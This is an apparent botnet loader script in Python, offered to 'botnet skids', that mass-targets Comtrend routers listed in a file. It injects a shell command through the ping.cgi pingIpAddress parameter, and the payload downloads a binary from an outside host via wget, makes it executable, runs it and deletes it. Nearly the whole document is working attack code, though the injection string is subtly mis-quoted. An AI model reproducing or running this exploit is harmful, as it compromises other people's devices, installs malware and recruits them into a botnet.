#!/usr/bin/python # vbrxmr botnet services the big 0day hacking trio here # enjoy this big ass vuln # for these botnet skids who cant write a loader lol import threading import sys import time import socket import requests from threading import Thread from time import sleep from requests.auth import HTTPDigestAuth from decimal import * ips = open(sys.argv[1], "r").readlines() payload = "cd /tmp; wget http://1.1.1.1/bins/sh; chmod 777 sh; sh sh; rm -rf sh" class comtrend(threading.Thread): def __init__ (self, ip): threading.Thread.__init__(self) self.ip = str(ip).rstrip('\n') def run(self): try: url = 'http://'+self.ip+'/ping.cgi?pingIpAddress=google.fr;"+payload+"&sessionKey=1039230114' requests.get(url, timeout=5) print("LOADING: " + self.ip) except Exception as e: pass for ip in ips: try: n = comtrend(ip) n.start() except: pass # vbrxmr botnet services the big 0day hacking trio here # enjoy this big ass vuln # for these botnet skids who cant write a loader lol